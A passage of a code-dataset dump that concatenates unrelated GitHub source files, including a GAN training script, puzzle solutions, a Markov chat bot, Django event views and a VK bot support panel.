== \"lenet5_halfed\":\n arch = LeNet5Halfed\n elif args.arch == \"resnet18\":\n arch = ResNet18\n\n # Create the directory for saving if it does not exist\n create_op_dir(args.output_dir)\n\n print(f\"Dataset: {args.dataset}\")\n print(f\"Model: {args.arch}\")\n\n for i in range(len(args.seeds)):\n print(f\"Iteration {i}, Seed {args.seeds[i]}\")\n\n np.random.seed(args.seeds[i])\n torch.manual_seed(args.seeds[i])\n\n # Load models\n model1 = arch(\n input_channel=args.m1_input_channel, output_size=args.output_size\n ).to(device)\n model1.load_state_dict(\n torch.load(\n args.model_dir + f\"{args.d1}_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n gan1 = train_model(\n gan=Generator(\n img_size=32, latent_dim=args.latent_dim, channels=args.m1_input_channel\n ).to(device),\n model=model1,\n device=device,\n config_args=args,\n )\n\n model2 = arch(\n input_channel=args.m2_input_channel, output_size=args.output_size\n ).to(device)\n model2.load_state_dict(\n torch.load(\n args.model_dir + f\"{args.d2}_{args.arch}_{args.seeds[i]}\",\n map_location=torch.device(\"cpu\"),\n )\n )\n gan2 = train_model(\n gan=Generator(\n img_size=32, latent_dim=args.latent_dim, channels=args.m2_input_channel\n ).to(device),\n model=model1,\n device=device,\n config_args=args,\n )\n\n # Save the pan model\n torch.save(\n gan1.state_dict(),\n args.output_dir\n + f\"gan_{args.dataset}({args.d1})_{args.arch}_{args.seeds[i]}\",\n )\n torch.save(\n gan2.state_dict(),\n args.output_dir\n + f\"gan_{args.dataset}({args.d2})_{args.arch}_{args.seeds[i]}\",\n )\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"disjoint_mnist\",\n choices=[\"disjoint_mnist\", \"mnist_cifar10\"],\n )\n parser.add_argument(\n \"--arch\",\n type=str,\n default=\"lenet5\",\n choices=[\"lenet5\", \"lenet5_halfed\", \"resnet18\"],\n )\n parser.add_argument(\"--batch_size\", type=int, default=512)\n parser.add_argument(\"--test_batch_size\", type=int, default=1000)\n parser.add_argument(\"--epochs\", type=int, default=200)\n parser.add_argument(\"--lr\", type=float, default=0.2, help=\"learning rate\")\n parser.add_argument(\n \"--latent_dim\", type=int, default=100, help=\"dimensionality of the latent space\"\n )\n parser.add_argument(\n \"--img_size\", type=int, default=32, help=\"size of each image dimension\"\n )\n parser.add_argument(\"--oh\", type=float, default=1, help=\"one hot loss\")\n parser.add_argument(\"--ie\", type=float, default=10, help=\"information entropy loss\")\n parser.add_argument(\"--a\", type=float, default=0.1, help=\"activation loss\")\n parser.add_argument(\"--no_cuda\", type=bool, default=False)\n parser.add_argument(\"--log_interval\", type=int, default=10)\n parser.add_argument(\"--save_results\", type=bool, default=True)\n parser.add_argument(\"--model_dir\", type=str, default=\"./cache/models/\")\n parser.add_argument(\"--output_dir\", type=str, default=\"./cache/models/gan/\")\n\n args = parser.parse_args()\n args.seeds = SEEDS\n\n train_gan(args)\n","repo_name":"cwkang1998/network-merging","sub_path":"train_gan.py","file_name":"train_gan.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"25248101329","text":"try:\n from .import gen_lookup\nexcept:\n from .import gen_lookup_python as gen_lookup\n #print(\"using python integration for line aware stat (install boost and gsl C++ libraries for faster runtime -- see documentation)\")\nimport numpy as np\nimport sys\nimport json\nimport pickle as pickle\nimport argparse\nimport os\n\ndef save_lookup_amp(p1,p2,ratio,outdir, ndet=2, pow_range = (1,400,500), frac_range = (0.1,1,10)):\n \"\"\"\n save the lookup table for two detectors with the line aware statistic with consitistent amplitude\n (uses json to save file)\n Args\n --------------\n p1 : float\n width of prior of signal model\n p2 : float\n width of prior of line model\n ratio : float\n ratio of line to noise models\n outdir: string\n directory to save lookup table file\n pow_range: tuple\n ranges for the spectrogram power (lower, upper, number), default (1,400,500)\n frac_range: tuple\n ranges for the ratios of sensitivity and duty cycle (lower, upper, number), default (0.1,1,10)\n \"\"\"\n minimum,maximum,num = pow_range\n minn,maxn,numn = frac_range\n #ch_arr_app = gen_data.gen_lookup_noise(np.linspace(minimum,maximum,num),np.linspace(minimum,maximum,num),np.linspace(minn,maxn,numn),int_type=\"chi2\",approx=False,pvs=p1,pvl=p2,beta=ratio)\n filename = outdir+\"/ch2_signoiseline_{}det_{}_{}_{}.json\".format(ndet,p1,p2,ratio)\n if os.path.isfile(filename):\n print((\"File {} exists\".format(filename)))\n else:\n ch_arr_app = gen_lookup.LineAwareAmpStatistic(np.linspace(minimum,maximum,num),fraction=np.linspace(minn,maxn,numn), ndet=ndet,signal_prior_width=p1,line_prior_width=p2,noise_line_model_ratio=ratio)\n with open(filename,'w+') as f:\n save_data = [[minimum,maximum,num,minn,maxn,numn],np.log(ch_arr_app[0]).tolist()]\n\n json.dump(save_data,f)\n\ndef save_lookup(p1,p2,ratio,outdir,ndet=2,pow_range = (1,400,500), k=2, N=48):\n \"\"\"\n save the lookup table for two detectors with the line aware statistic\n \n Args\n --------------\n p1 : float\n width of prior of signal model\n p2 : float\n width of prior of line model\n ratio : float\n ratio of line to noise models\n outdir: string\n directory to save lookup table file\n pow_range: tuple\n ranges for the spectrogram power (lower, upper, number), default (1,400,500)\n\n \"\"\"\n\n minimum,maximum,num = pow_range\n\n if os.path.isfile(outdir+\"/signoiseline_{}det_{}_{}_{}.txt\".format(ndet, p1,p2,ratio)):\n pass\n else:\n if ndet == 1:\n ch_arr_app = gen_lookup.LineAwareStatistic(np.linspace(minimum,maximum,num),\n ndet=ndet,\n signal_prior_width=p1,\n line_prior_width=p2,\n noise_line_model_ratio=ratio)\n if ndet == 2:\n powers = np.linspace(minimum,maximum,num)\n ch_arr_app = gen_lookup.LineAwareStatistic(powers=powers,\n ndet=ndet,\n k = k,\n N = N,\n signal_prior_width=p1,\n line_prior_width=p2,\n noise_line_model_ratio=ratio)\n with open(outdir+\"/signoiseline_{}det_{}_{}_{}.txt\".format(ndet, p1,p2,ratio),'wb') as f:\n header = \"{} {} {}\".format(minimum,maximum,num)\n np.savetxt(f,np.log(ch_arr_app.signoiseline),header = header)\n\n\n\ndef resave_files(p1,p2,ratio,output):\n \"\"\"\n resave text files into pickle format\n \"\"\"\n if os.path.isfile(output+\"/txt/ch2_signoiseline_{}_{}_{}.txt\".format(p1,p2,ratio)):\n with open(output+\"/txt/ch2_signoiseline_{}_{}_{}.txt\".format(p1,p2,ratio),'rb') as f:\n save_array = pickle.load(f)\n if os.path.isdir(output+\"/pkl/\"):\n pass\n else:\n os.mkdir(output+\"/pkl/\")\n with open(output+\"/pkl/ch2_signoiseline_{}_{}_{}.pkl\".format(p1,p2,ratio),'wb') as f:\n pickle.dump(save_array,f,protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n prog = 'SOAP lookup table generation',\n description = 'generates lookup tables for SOAP',)\n\n parser.add_argument('--amp-stat',action='store_true') \n parser.add_argument('-s', '--signal-probability', required=True, type=float) \n parser.add_argument('-l', '--line-probability', required=True, type=float) \n parser.add_argument('-n', '--noise-line-ratio', required=True, type=float) \n parser.add_argument('-ndet', '--ndet', default=2, required=False, type=int) \n parser.add_argument('-k', default=2, required=False, type=int) \n parser.add_argument('-N', '--num-sfts', default=48, required=False, type=int) \n parser.add_argument('-o', '--save-dir', required=True, type=str) \n \n parser.add_argument('-pmin', '--pow-min', default=1, required=False, type=float) \n parser.add_argument('-pmax', '--pow-max', default=400, required=False, type=float) \n parser.add_argument('-np', '--n-powers', default=500, required=False, type=int) \n\n parser.add_argument('-fmin', '--frac-min', default=0.1, required=False, type=float) \n parser.add_argument('-fmax', '--frac-max', default=1, required=False, type=float) \n parser.add_argument('-nf', '--n-fracs', default=10, required=False, type=int) \n\n args = parser.parse_args()\n\n if not args.amp_stat:\n save_lookup(args.signal_probability,\n args.line_probability,\n args.noise_line_ratio,\n args.save_dir,\n k = args.k,\n N = args.num_sfts,\n ndet=args.ndet,\n pow_range = (args.pow_min,args.pow_max,args.n_powers))\n else:\n save_lookup_amp(args.signal_probability,\n args.line_probability,\n args.noise_line_ratio,\n args.save_dir, \n ndet = args.ndet, \n pow_range = (args.pow_min,args.pow_max,args.n_powers), \n frac_range = (args.frac_min,args.frac_max,args.n_fracs))\n","repo_name":"jcbayley/soapcw","sub_path":"src/soapcw/line_aware_stat/save_lookup.py","file_name":"save_lookup.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"40694326118","text":"############################################################################\n# PROBLEM - Apples and Oranges\n'''Sample input\n7 11\n5 15\n3 2\n-2 2 1\n5 -6\n'''\n#---------------------------------------------------------------------------\n# solution 1\ndef countApplesAndOranges(s, t, a, b, apples, oranges):\n count_apple = sum([ ((f+a)>=s and (f+a)<=t) for f in apples])\n count_oranges = sum([ ((o+b)>=s and (o+b)<=t) for o in oranges])\n print(count_apple, count_oranges, sep = '\\n')\n\n\n# Solution 2\ndef countApplesAndOranges2(s, t, a, b, apples, oranges):\n print(sum(s <= a + d <= t for d in apples))\n print(sum(s <= b + d <= t for d in oranges))\n\n\nif __name__ == '__main__':\n st = input().split()\n s = int(st[0])\n t = int(st[1])\n ab = input().split()\n a = int(ab[0])\n b = int(ab[1])\n mn = input().split()\n m = int(mn[0])\n n = int(mn[1])\n apples = list(map(int, input().rstrip().split()))\n oranges = list(map(int, input().rstrip().split()))\n countApplesAndOranges(s, t, a, b, apples, oranges)\n\n#---------------------------------------------------------------------------","repo_name":"ygnash/Hacker_Rank_Solutions","sub_path":"ProblemSolving/apples_oranges.py","file_name":"apples_oranges.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"72243945046","text":"import re\r\nimport random\r\nfrom analyzer import analyze,keyword_check,parse\r\nfrom itertools import chain\r\n\r\nclass Markov:\r\n def make(self):\r\n \r\n filename = \"log.txt\"\r\n with open(filename,\"r\",encoding='utf_8')as f:\r\n text=f.read()\r\n text=re.sub('> ','',text)\r\n text=re.sub(\r\n 'ptna:Repart|ptna:Random|ptna:Pattern|ptna:Template|ptna:markov',\r\n '',\r\n text)\r\n text = re.sub('Ptna System Dialogue Log:.*\\n','',text)\r\n text = re.sub('\\n\\n','\\n',text)\r\n\r\n wordlist = parse(text)\r\n markov ={}\r\n p1=''\r\n p2=''\r\n p3=''\r\n for word in wordlist:\r\n if p1 and p2 and p3:\r\n if (p1,p2,p3) not in markov:\r\n markov[(p1,p2,p3)]=[]\r\n markov[(p1,p2,p3)].append(word)\r\n p1,p2,p3=p2,p3,word\r\n count = 0\r\n sentence=''\r\n p1,p2,p3 =random.choice(list(markov.keys()))\r\n while count ')\r\n parse = analyze(line)\r\n\r\n m=[]\r\n for word,part in parse:\r\n if keyword_check(part):\r\n for element in sentences:\r\n find = '.:?'+ word +'.*'\r\n tmp=re.findall(find,element)\r\n if tmp:\r\n m.append(tmp)\r\n m = list(chain.from_iterable(m))\r\n if m:\r\n print(random.choice(m))\r\n else:\r\n print(random.choice(sentences))","repo_name":"Rinsama10/ptna","sub_path":"ptna/markov2_bot.py","file_name":"markov2_bot.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"10300823121","text":"# -*- python -*-\n# encoding: utf-8\n\nimport os\n\ndef configure(conf):\n conf.env.append_value('MODULES_AVAILABLE', 'mateconf')\n if 'mateconf' in conf.env['ENABLE_MODULES'] or 'all' in conf.env['ENABLE_MODULES']:\n if conf.pkg_check_modules('MATECONF', 'mateconf-2.0 >= 2.12 pygobject-2.0',\n mandatory=False):\n conf.env.append_value('MODULES_TO_BUILD', 'mateconf')\n\n\ndef build(bld):\n \n if 'mateconf' in bld.env['MODULES_TO_BUILD']:\n bld.codegen('mateconf', local_load_types=['mateconf-arg-types.py'])\n pyext = bld.create_pyext()\n pyext.source = 'mateconfmodule.c mateconf.c mateconf-fixes.c mateconf-types.c'\n pyext.target = 'mateconf'\n pyext.uselib = 'MATECONF'\n pyext.includes = '.'\n pyext.install_path = '${PYTHONDIR}/gtk-2.0'\n\n bld.install_files('${DATADIR}/pygtk/2.0/defs',\n ['mateconf.defs'])\n\n bld.install_files('${DATADIR}/pygtk/2.0/argtypes',\n 'mateconf-arg-types.py')\n","repo_name":"mate-desktop-legacy-archive/python-mate","sub_path":"mateconf/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"3956576480","text":"from tests.atest.utils import RuleAcceptance\n\n\nclass TestRuleAcceptance(RuleAcceptance):\n def test_rule(self):\n self.check_rule(src_files=[\"test.robot\"], expected_file=\"expected_output.txt\")\n\n def test_severity(self):\n self.check_rule(\n config=\"-c too-many-arguments:severity_threshold:warning=5:error=7\",\n src_files=[\"severity.robot\"],\n expected_file=\"expected_output_severity.txt\",\n )\n\n def test_disablers(self):\n self.check_rule(\n config=\"-c too-many-arguments:max_args:1\",\n src_files=[\"disablers.robot\"],\n expected_file=\"expected_output_disablers.txt\",\n )\n","repo_name":"MarketSquare/robotframework-robocop","sub_path":"tests/atest/rules/lengths/too_many_arguments/test_rule.py","file_name":"test_rule.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"30"} +{"seq_id":"14984443988","text":"import argparse\nimport logging\nimport os\n\nimport yaml\nfrom jinja2 import Environment, FileSystemLoader\n\nCONFIG_DIR = \"dag_configs/\"\nOUTPUT_DIR = \"outputs/\"\n\nlogger = logging.getLogger(__name__)\n\n\ndef fetch_args():\n \"\"\"Process command line argument options\n\n Returns\n -------\n arg : namespace values\n \"\"\"\n p = argparse.ArgumentParser()\n p.add_argument(\n \"--job_type\",\n help=\"Type of job to execute.\",\n nargs=\"+\",\n type=str,\n required=False,\n )\n p.add_argument(\n \"--job_name\",\n help=\"Name of job to execute.\",\n nargs=\"+\",\n type=str,\n required=False,\n )\n return p.parse_args()\n\n\ndef fetch_dags(job_types=None, job_names=None):\n \"\"\"Return the configurations needed for the jobs to compose.\n Consider the passed in filters or return everything if both are None.\n\n Parameters\n ----------\n job_types : str\n types of jobs to filter down to use for processing\n job_names : str\n names of jobs to filter down to use for processing\n\n Returns\n -------\n file_location, template, config_name : Tuple[str]\n Location of the configuration\n Template to use for composition\n Name of the configuration\n \"\"\"\n\n def filter_condition(item, filter_list):\n ret_val = False\n if filter_list and item not in filter_list:\n ret_val = True\n return ret_val\n\n # consider all files in the folder (and subfolders) for processing\n for path, folder, configs in os.walk(CONFIG_DIR):\n _, template = os.path.split(path)\n\n # filter by template name for the type of job to compose\n if filter_condition(template, job_types):\n continue\n\n for config in configs:\n config_name, _ = os.path.splitext(config)\n\n # filter by config_name value for the names of jobs to compose\n if filter_condition(config_name, job_names):\n continue\n\n file_location = os.path.join(path, config)\n yield file_location, template, config_name\n\n\ndef generate_dags():\n def generate_dag(file_location, template, config_name):\n export_filename = os.path.join(OUTPUT_DIR, f\"load_{config_name}.py\")\n template = env.get_template(f\"{template}.template\")\n\n with open(file_location, \"r\") as configuration_file:\n configuration = yaml.load(configuration_file, Loader=yaml.SafeLoader)\n\n output = template.render(\n dag_name=config_name,\n version_number=configuration.get(\"version\"),\n description=configuration.get(\"description\"),\n schedule=configuration.get(\"schedule\"),\n max_runs=configuration.get(\"max_runs\"),\n tags=configuration.get(\"tags\"),\n catchup=configuration.get(\"catchup\"),\n endpoint=configuration.get(\"endpoint\"),\n )\n\n with open(export_filename, \"w\") as export_file:\n export_file.write(output)\n export_file.write(\"\\n\")\n\n logger.info(f\"DAG file {export_filename} created\")\n\n env = Environment(loader=FileSystemLoader(\"templates\"))\n dags_to_generate = fetch_dags(args.job_type, args.job_name)\n\n for file_location, template, config_name in dags_to_generate:\n generate_dag(file_location, template, config_name)\n\n\nif __name__ == \"__main__\":\n # Get the passed in arguments\n args = fetch_args()\n generate_dags()\n","repo_name":"paschmaria/datafest-airflow-workshop","sub_path":"dags_generation/generate_dag_files.py","file_name":"generate_dag_files.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"38916531861","text":"import logging\nimport sys\nimport os\n\nimport seo.slo.error\n\n\ndef create_console_handler(prog_name, debug_flag):\n \"\"\" Create the console logging handler\n\n Parameters:\n prog_name - program name as provided by the argparse.ArgumentParser.prog field\n debug_flag - if true, the log threshold will be set to DEBUG and the logs will be printed in a verbose\n format; otherwise the log threshold will be set to INFO\n \"\"\"\n\n entry_fmt_long = f\"%(asctime)s.%(msecs)03d {prog_name}: [%(levelname)s] %(message)s (%(module)s@%(lineno)d)\"\n entry_fmt_short = f\"{prog_name}: [%(levelname)s] %(message)s\"\n date_fmt = \"%H:%M:%S\"\n\n handler = logging.StreamHandler(sys.stderr)\n if debug_flag:\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(logging.Formatter(entry_fmt_long, date_fmt))\n else:\n handler.setLevel(logging.INFO)\n handler.setFormatter(logging.Formatter(entry_fmt_short, date_fmt))\n\n return handler\n\n\ndef create_file_handler(prog_name, logs_path):\n \"\"\" Create the file logging handler\n\n Parameters:\n prog_name - program name as provided by the argparse.ArgumentParser.prog field\n logs_path - path to the logs output directory\n \"\"\"\n\n entry_fmt = (\n \"%(asctime)s.%(msecs)03d [%(levelname)5.5s] %(message)s (%(module)s@%(lineno)d)\")\n date_fmt = \"%Y-%m-%d_%H:%M:%S\"\n\n prog_base = os.path.splitext(os.path.basename(prog_name))[0]\n file_path = os.path.join(logs_path, f\"{prog_base}.log\")\n\n try:\n os.makedirs(logs_path, exist_ok=True)\n except OSError as e:\n raise seo.slo.error.AppException(\n seo.slo.error.Codes.RUNTIME_ERROR,\n f\"Failed to create the logs directory ({os.path.relpath(logs_path)}):\\n\"\n f\" {e}\")\n\n try:\n with open(file_path, \"a\") as f:\n f.write(f\"{'='*119}\\n\")\n except OSError as e:\n raise seo.slo.error.AppException(\n seo.slo.error.Codes.RUNTIME_ERROR,\n f\"Failed to write to the log file ({os.path.relpath(file_path)}):\\n\"\n f\" {e}\")\n\n handler = logging.FileHandler(file_path)\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(logging.Formatter(entry_fmt, date_fmt))\n\n logging.info(\"Program logs are saved to the '%s' file\", os.path.relpath(file_path))\n\n return handler\n\n\ndef config(prog_name, debug_flag, logs_path=None):\n \"\"\" Configure the logging package considering provided CLI arguments\n\n Parameters:\n prog_name - program name as provided by the argparse.ArgumentParser.prog field\n debug_flag - enable more verbose screen logs when true; see the create_console_handler function doc\n logs_path - path to the logs output directory; when None, the file logging will be disabled\n \"\"\"\n\n # Enable the console logger in the first place. Splitting it from the file handler creation will allow consistent\n # error handling if a runtime error occurs during the file handler creation:\n logging.getLogger().addHandler(create_console_handler(prog_name, debug_flag))\n logging.getLogger().setLevel(logging.DEBUG)\n # Enable the file logger:\n if logs_path:\n logging.getLogger().addHandler(create_file_handler(prog_name, logs_path))\n","repo_name":"mahehswari/new-","sub_path":"scripts/deploy_esp/seo/slo/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"32775999081","text":"from dash import Dash\nfrom dash.dependencies import Input, Output, State\n\n\ndef select_all_callback(app: Dash, button_id: str, dropdown_id: str):\n @app.callback(\n Output(dropdown_id, 'value'),\n Input(button_id, 'n_clicks'),\n State(dropdown_id, 'options')\n )\n def __select_all_callback(click, options):\n values = [\n e if type(e) != dict else e['value'] for e in\n options\n ]\n return values\n","repo_name":"IBM/nesa-demo","sub_path":"utils_demo/callbacks/select_all_callback.py","file_name":"select_all_callback.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"30"} +{"seq_id":"17922074472","text":"# Import the csv module to read the csv file\n# Import the os file to join with the path and make it independent of os type\nimport csv\nimport os\nimport string\n\ncsvpath = os.path.join('..','Resources', 'budget_data.csv')\n\nwith open(csvpath, newline='') as csvfile:\n\n # CSV reader specifies the delimiter and variable that holds contents\n csvreader = csv.reader(csvfile,delimiter=',')\n\nnext(csvreader) # Skip header\nrow_count = 0\ndeltaList=[]\nfor row in csvreader:\n\tvalue = row[1]\n\tif row_count > 1:\n\t\tdifference = previous - value\n\tprevious = value\n\tdelta_List.append(difference)\n\trow_count = 1","repo_name":"JFrancisOlson/Python","sub_path":"difference_calcs.py","file_name":"difference_calcs.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"3730051579","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom .models import add_user_to_list_of_attendees\nfrom django.views.generic import ListView, DetailView\nfrom .forms import RegisterForm\nfrom django.contrib.auth import login, authenticate\nfrom django.http import HttpResponseRedirect\nfrom django.core.mail import send_mail\n\ndef home(request):\n return render(request,'home.html')\n\ndef register(request):\n if request.method == \"POST\":\n form = RegisterForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db()\n user.profile.age = form.cleaned_data.get('age')\n user.profile.estado = form.cleaned_data.get('estado')\n user.profile.empresa = form.cleaned_data.get('empresa')\n user.save()\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n return redirect(\"/\") \n else:\n form = RegisterForm()\n return render(request,'signup.html',{\"form\":form})\n\n\ndef eventos(request):\n if request.method == \"GET\":\n if User.is_authenticated:\n eventos=Evento.objects.all()\n boletos=Boleto.objects.all()\n boletos_usuario= Boleto.objects.filter(user=request.user)\n myList=[]\n for b in boletos_usuario:\n myList.append(b.evento.id)\n \n return render(request,\"accounts/eventos.html\",{'eventos':eventos , 'boletos':boletos,'myList':myList})\n else:\n return redirect(\"/\") \n \nclass EventListView(ListView):\n model = Evento\n template_name = 'accounts/eventos.html'\n context_object_name = 'eventos'\n\ndef event_add_attendance(request, pk):\n this_event = Evento.objects.get(pk=pk)\n user_id=request.user\n \n flag = Boleto.objects.filter(evento=this_event,user=user_id).exists()\n if not Boleto.objects.filter(evento=this_event,user=user_id).exists():\n c=str(this_event.siglas)+str(user_id.id)\n add_user_to_list_of_attendees(self=this_event, user=request.user,codigo=c)\n boleto = Boleto.objects.filter(evento=this_event,user=user_id)\n \n return render(request,\"inscription.html\",{'this_event':this_event,'flag':flag,'boleto':boleto})\n else:\n boleto = Boleto.objects.filter(evento=this_event,user=user_id)\n return render(request,\"inscription.html\",{'this_event':this_event,'flag':flag,'boleto':boleto})\n\nclass EventDetailView(DetailView):\n model = Evento\n \n\n\n\ndef register_event(request):\n if request.method == \"GET\":\n return render(request,\"register_event.html\")\n","repo_name":"CelisIvan/YOCPLUSPQ2","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"13689453784","text":"from typing import List\n\n\nclass Solution:\n def convertToTitle(self, n: int) -> str:\n res = \"\"\n if n < 26:\n return chr(n + 64)\n while n >= 26:\n n -= 1\n n, remainder = divmod(n, 26)\n res = chr(remainder + 65) + res\n if 0 < n < 26:\n res = chr(n + 64) + res\n return res\n\n\na = Solution()\nin_para1 = 52\nin_para2 = -2147483648\nresu = a.convertToTitle(in_para1)\nprint(resu)","repo_name":"VittorioYan/Leetcode-Python","sub_path":"168.py","file_name":"168.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"29582409477","text":"import functools\n\n\ndef cmp(l1, l2):\n if isinstance(l1, int) and isinstance(l2, int):\n if l1 < l2:\n return -1\n if l1 > l2:\n return 1\n else:\n return 0\n for i in range(max(len(l1), len(l2))):\n try:\n i1 = l1[i]\n except IndexError:\n return -1\n try:\n i2 = l2[i]\n except IndexError:\n return 1\n # check the types\n if isinstance(i1, int) and isinstance(i2, int):\n pass\n elif isinstance(i1, int):\n i1 = [i1]\n elif isinstance(i2, int):\n i2 = [i2]\n res = cmp(i1, i2)\n if res == -1:\n return -1\n if res == 1:\n return 1\n return 0\n\n\ndef task1(input_):\n with open(input_) as fh:\n lines = fh.read().splitlines()\n\n indices = []\n i = 1\n candidates = []\n for line in lines:\n if not line:\n if cmp(candidates[0], candidates[1]) == -1:\n indices.append(i)\n i += 1\n candidates = []\n continue\n candidates.append(eval(line))\n if cmp(candidates[0], candidates[1]) == -1:\n indices.append(i)\n\n return sum(indices)\n\n\ndef task2(input_):\n with open(input_) as fh:\n lines = fh.read().splitlines()\n\n packets = []\n for line in lines:\n if not line:\n continue\n packets.append(eval(line))\n packets.append([[2]])\n packets.append([[6]])\n\n packets.sort(key=functools.cmp_to_key(cmp))\n i = packets.index([[2]]) + 1\n j = packets.index([[6]]) + 1\n return i * j\n\n\nassert task1('test_input.txt') == 13\nprint(task1('input.txt'))\n\nassert task2('test_input.txt') == 140\nprint(task2('input.txt'))\n","repo_name":"venthur/aoc","sub_path":"2022/13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"40057121607","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nimport sys \n\nn = int(input())\nphonebook = dict()\n\ndef check_key(dict, key):\n if key in dict:\n print(\"{}={}\".format(key, dict[key]))\n # print(key, dict[key])\n else:\n print(\"Not found\")\n\nfor _ in range(0,n):\n name, phonenumber = input().split()\n phonebook[name] = phonenumber\n\nwhile True: \n try:\n key =input()\n check_key(phonebook,key)\n except EOFError:\n break\n","repo_name":"mirianfsilva/code-challenges","sub_path":"30 Days of Code/day08-dictionaries_and_maps.py","file_name":"day08-dictionaries_and_maps.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"26205418366","text":"import json\nimport random\nfrom datetime import datetime\n\nfrom tortoise.exceptions import DoesNotExist\nfrom vkbottle import Keyboard\nfrom vkbottle.bot import Message\nfrom vkbottle.framework.labeler import BotLabeler\n\nfrom config import admin_list, bot, ADMIN_GRADES, USER_STATUSES\nfrom menu.utils import generate_choice_keyboard_with_pagination\nfrom users.handlers import start\nfrom users.models import UserModel\nfrom users.utils import get_clickable_user_name\nfrom .models import QuestionModel\nfrom .keyboards import admin_menu_keyboard, support_menu_keyboard, back_to_support_menu_keyboard, back_to_questions_list\nfrom .states import UnansweredQuestionsState, AnsweredQuestionsState\n\nbl = BotLabeler()\n\n\n@bl.private_message(payload={'menu': 'admin'})\nasync def open_admin_menu(message: Message):\n await message.answer('🗝 Открываю админ панель', keyboard=admin_menu_keyboard)\n\n\n@bl.private_message(payload={'admin': 'admin_list'})\nasync def show_admin_list(message: Message):\n text = '📑 Список администраторов\\n\\n'\n for vk_id, status in admin_list.storage.items():\n text += f'{ADMIN_GRADES[status][\"emoji\"]} {status} - {await get_clickable_user_name(vk_id)}\\n'\n await message.answer(text, keyboard=admin_menu_keyboard)\n\n\n@bl.private_message(payload={'admin': 'support'})\nasync def show_support_menu(message: Message):\n await message.answer('☎ Открываю меню технической поддержки', keyboard=support_menu_keyboard)\n\n\n@bl.private_message(payload={'support': 'unanswered'})\nasync def show_unanswered_questions(message: Message, questions: list = None, page_number: int = 0):\n text = f'📃 Список открытых обращений | Страница {page_number + 1}'\n\n if not questions:\n questions = await QuestionModel.filter(answer=None)\n number_of_questions = len(questions)\n\n if not number_of_questions:\n return await message.answer(\n '😕 Список обращений пуст',\n keyboard=support_menu_keyboard\n )\n\n questions_ids = []\n for q in questions[page_number * 3:page_number * 3 + 3]:\n questions_ids.append(q.pk)\n text += f'\\n\\n🔹№{q.pk}' \\\n f'💬 {q.text}\\n' \\\n f'👤 Отправитель: {await get_clickable_user_name((await q.from_user).vk_id)}'\n\n kb = generate_choice_keyboard_with_pagination(\n numbers=questions_ids,\n prev_page=(page_number > 0),\n next_page=True if number_of_questions - (page_number * 3 + 3) > 0 else False,\n back_label='◀⁉ Обращения'\n )\n await message.answer(text, keyboard=kb)\n await bot.state_dispenser.set(\n message.from_id,\n UnansweredQuestionsState.SHOW_UNANSWERED_QUESTIONS,\n questions=questions,\n number_of_questions=number_of_questions,\n current_page=page_number,\n keyboard=kb\n )\n\n\n@bl.private_message(state=UnansweredQuestionsState.SHOW_UNANSWERED_QUESTIONS)\nasync def choose_question_to_answer(message: Message):\n state_payload = message.state_peer.payload\n if not message.payload:\n return await message.answer(\n message='❗ Некорректный ввод!',\n keyboard=state_payload['keyboard']\n )\n\n choice = json.loads(message.payload)['choice']\n if choice == 'back':\n await bot.state_dispenser.delete(message.from_id)\n await show_support_menu(message)\n elif choice == 'prev_page':\n await show_unanswered_questions(\n message,\n questions=state_payload['questions'],\n page_number=state_payload['current_page'] - 1\n )\n elif choice == 'next_page':\n await show_unanswered_questions(\n message,\n questions=state_payload['questions'],\n page_number=state_payload['current_page'] + 1\n )\n else:\n await bot.state_dispenser.set(\n message.from_id,\n UnansweredQuestionsState.ANSWER_QUESTION,\n question_id=choice\n )\n await message.answer(\n f'📞 Для ответа выбран вопрос №{choice}\\n\\n'\n f'❗ Напишите ответ на вопрос или воспользуйтесь кнопкой, чтобы вернуться в меню тех.поддержки',\n 